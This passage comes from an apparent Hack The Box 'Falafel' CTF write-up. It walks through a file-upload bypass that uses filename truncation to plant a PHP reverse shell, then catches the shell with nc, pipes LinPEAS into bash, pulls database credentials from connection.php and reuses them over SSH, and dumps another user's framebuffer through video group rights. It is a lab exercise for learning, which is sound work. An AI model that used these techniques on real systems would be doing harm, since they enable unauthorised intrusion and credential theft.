+ → touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
+
+
+However it needs to end in .gif, that's 4 characters, so remove 4 characters and add .gif at the end:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → mv Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → l
+ total 84K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 14:44 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 0 Dec 21 14:42 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+
+
+So now that we have our 255 char long filename ending in .gif, we're going to give it the GIF magic bytes so that it gets considered as an actual GIF image:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → echo 'GIF8;' >> Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → echo 'Ippsec Is Awesome' >> Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif: GIF image data 28745 x 29552
+
+
+
+Now that we gave it the magic bytes and some junk data, file considers that file as a GIF image with data being 28745 x 29552.
+
+ 
+
+So here we do CTRL+U to view sourcecode and we're going to check what happened to our file:
+
+
+
+And here we see what's happening, the server didn't like our filename being that long, so it shortened it to the following string:
+
+
+ The name is too long, 255 chars total.
+ Trying to shorten...
+ New name is Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah.
+ --2020-12-21 15:59:18-- http://10.10.14.6:9090/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+ Connecting to 10.10.14.6:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 24 [image/gif]
+ Saving to: 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah'
+
+ 0K 100% 3.78M=0s
+
+ 2020-12-21 15:59:18 (3.78 MB/s) - 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah' saved [24/24]
+
+
+
+Here we can see that the server shortened our 255 char long filename to a 236 char long filename.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → echo -n 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah' | wc -c
+
+ 236
+
+
+
+Therefore since we know that the server will only acccept gif files, AND that once the file is uploaded it will get shortened to 236 characters, we're going to create a filename that is 232 chars long , make it end in .php so that the filename with the php extension is 236 chars long, and since the server will only accept image files, we're going to make it end in .gif, so let's do that with python:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A")'
+ A
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232)'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232,".php")'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .php
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232,".php",".gif")'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .php .gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232,".php",".gif",sep="")'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+
+
+And there you have it! now create the file, and add in a reverse php shell payload:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → touch $(python3 -c 'print("A"*232,".php",".gif",sep="")')
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → l
+ total 88K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 15:10 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 0 Dec 21 15:10 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → vim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+
+
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → l
+ total 88K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 15:16 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 76 Dec 21 15:16 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif: PHP script, ASCII text
+
+
+
+And we have our file, but as you can see it detects it as php file, but it doesn't matter since the server only cares about the .gif extension. so let's upload it:
+
+
+
+Doing CTRL+U we see that it saved the file correctly as .php:
+
+
+ The name is too long, 240 chars total.
+ Trying to shorten...
+ New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
+ --2020-12-21 16:18:12-- http://10.10.14.6:9090/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ Connecting to 10.10.14.6:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 76 [image/gif]
+ Saving to: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php'
+
+ 0K 100% 11.5M=0s
+
+ 2020-12-21 16:18:12 (11.5 MB/s) - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php' saved [76/76]
+
+
+
+And now from here, we're going to curl the to the url where our file is and get a reverse shell on port 9003:
+
+_Terminal 1:_
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → curl http://10.10.10.73/uploads/1221-1618_a5410da1317c2102/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php
+
+
+
+` _Terminal 2_
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ **connect to [10.10.14.6] from (UNKNOWN) [10.10.10.73] 52856**
+ bash: cannot set terminal process group (1238): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ ls /home
+ ls /home
+ moshe
+ yossi
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$
+
+
+
+Now before moving on, we're going to upgrade our shell to a fully interactive shell since python3 is available on this box:
+
+
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ cd ~
+ cd ~
+
+ www-data@falafel:/var/www$ which python3
+ which python3
+ /usr/bin/python3
+
+ www-data@falafel:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ www-data@falafel:/var/www$
+
+
+
+once that's done, we're going to get tab autocomplete, to do so hit CTRL+Z to background the shell:
+
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ ^Z
+ stty raw -echo
+ fg
+
+
+
+As you can see here, this no longer works because on kali 2020.4 the default shell no longer is bash , but now is zsh.
+
+
+
+as shown above, this is the old method for bash and not for zsh, therefore to get a fully-interactive shell on zsh do the following:
+
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ ^Z
+ stty raw -echo ;fg
+
+
+
+
+
+So as you can see, that's the new method, but you also want to be able to clear the screen, therefore you will need to set the TERM environment variable:
+
+
+
+
+ reset
+ export SHELL=bash
+ export TERM=screen-256color
+ stty rows 50 columns 141
+
+
+
+` 
+
+And now we finally got our fully interactive reverse shell. From here we're going to use an improved version of LinEnum.sh to check for privesc paths, it's called LinPEAS, you can find it on github [here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS):
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/Tools]
+ → cd ~/Tools/
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/Tools]
+ → git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/ linpeas
+ Cloning into 'linpeas'...
+ remote: Enumerating objects: 22, done.
+ remote: Counting objects: 100% (22/22), done.
+ remote: Compressing objects: 100% (15/15), done.
+ remote: Total 3036 (delta 11), reused 14 (delta 7), pack-reused 3014
+ Receiving objects: 100% (3036/3036), 14.38 MiB | 2.29 MiB/s, done.
+ Resolving deltas: 100% (1749/1749), done.
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/Tools]
+ → cd ~/_HTB/Falafel
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → sudo updatedb
+ [sudo] password for nothing:
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → locate linpeas.sh
+ /home/nothing/Tools/linpeas/linPEAS/linpeas.sh
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → cp $(locate linpeas.sh) .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → l
+ total 392K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 15:57 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 76 Dec 21 15:16 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ -rwxr-xr-x 1 nothing nothing 302K Dec 21 15:57 linpeas.sh
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+
+
+Now that we got our linpeas.sh let's get it onto the box:
+
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ which wget && which curl
+ /usr/bin/wget
+ /usr/bin/curl
+
+
+
+We can use both wget or curl to get it on the box, but for now we're going to use curl and pipe it into bash:
+
+
+
+Here, linpeas is going to find EVERYTHING for us, therefore i'm going to put the full results [here](prg/9/linpeas.html):
+
+Basically, linpeas found a few interesting things for us:
+
+
+
+That's the unintended way of doing the box, you just grab whatever CVEs linenum.sh/linpeas.sh report to you and try them one by one. The intended way of doing this box is to poke around the web service and find moshe's password that was in the connection.php file:
+
+
+ www-data@falafel:/var/www/html/uploads/1221-1520_fcb5b2f30c7007fd$ cd ../..
+ www-data@falafel:/var/www/html$ ls
+ assets connection.php cyberlaw.txt header.php images js login_logic.php profile.php style.php uploads
+ authorized.php css footer.php icon.png index.php login.php logout.php robots.txt upload.php
+ www-data@falafel:/var/www/html$ cat connection.php
+ <****?php
+ define('DB_SERVER', 'localhost:3306');**define('DB_USERNAME', 'moshe');
+ define('DB_PASSWORD', 'falafelIsReallyTasty');**
+ define('DB_DATABASE', 'falafel');
+ $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
+ // Check connection
+ if (mysqli_connect_errno())
+ {
+ echo "Failed to connect to MySQL: " . mysqli_connect_error();
+ }
+ ?>
+
+
+
+And there we have it, we have credentials: **moshe:falafelIsReallyTasty** now instead of su as moshe we're going to login via ssh as the moshe user :
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → ssh moshe@10.10.10.73
+ The authenticity of host '10.10.10.73 (10.10.10.73)' can't be established.
+ ECDSA key fingerprint is SHA256:XPYifpo9zwt53hU1RwUWqFvOB3TlCtyA1PfM9frNWSw.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.73' (ECDSA) to the list of known hosts.
+ moshe@10.10.10.73's password:
+ Permission denied, please try again.
+ moshe@10.10.10.73's password:
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Feb 5 23:35:10 2018 from 10.10.14.2
+ $ bash
+ setterm: terminal screen-256color does not support --blank
+ moshe@falafel:~$ id
+ uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
+ moshe@falafel:~$ ls
+ user.txt
+ moshe@falafel:~$ cat user.txt
+ c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there we have it! we got the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root user, we need to take a look at the video group:
+
+
+ moshe@falafel:~$ w
+ 17:35:08 up 4:55, 2 users, load average: 0.00, 0.00, 0.00
+ USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
+ yossi tty1 12:39 4:55m 0.06s 0.05s -bash
+ moshe pts/2 10.10.14.6 17:31 0.00s 0.02s 0.00s w
+
+ moshe@falafel:~$ id
+ uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
+
+
+
+Here we are hinted toward something: first of all the user yossi is logged in from tty1, which could mean that he is logged in physically to the machine, next is that we are part of the video group, therefore we could try to dump whatever is on yossi's screen:
+
+
+ moshe@falafel:~$ ls /dev/ -lash | grep fb
+ 0 crw-rw---- 1 root video 29, 0 Dec 21 12:39 fb0
+
+
+
+` 
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → file fb.raw
+ fb.raw: Targa image data - Map (256-257) 257 x 1 x 1 +257 +1 - 1-bit alpha "\001"
+
+
+
+Then to view it we're going to use gimp:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → sudo apt install gimp -y
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → gimp
+
+
+`  
+
+However here you can see that we get some garbage, it cannot display what we want and that is because it does not have the correct size, so we're going to enumerate it further to get it's size from moshe's ssh connection:
+
+
+ moshe@falafel:/sys$ find . | grep fb0
+ find: ‘./fs/fuse/connections/40’: Permission denied
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/dev
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/pan
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/name
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/mode
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/console
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/blank
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/modes
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/control
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/async
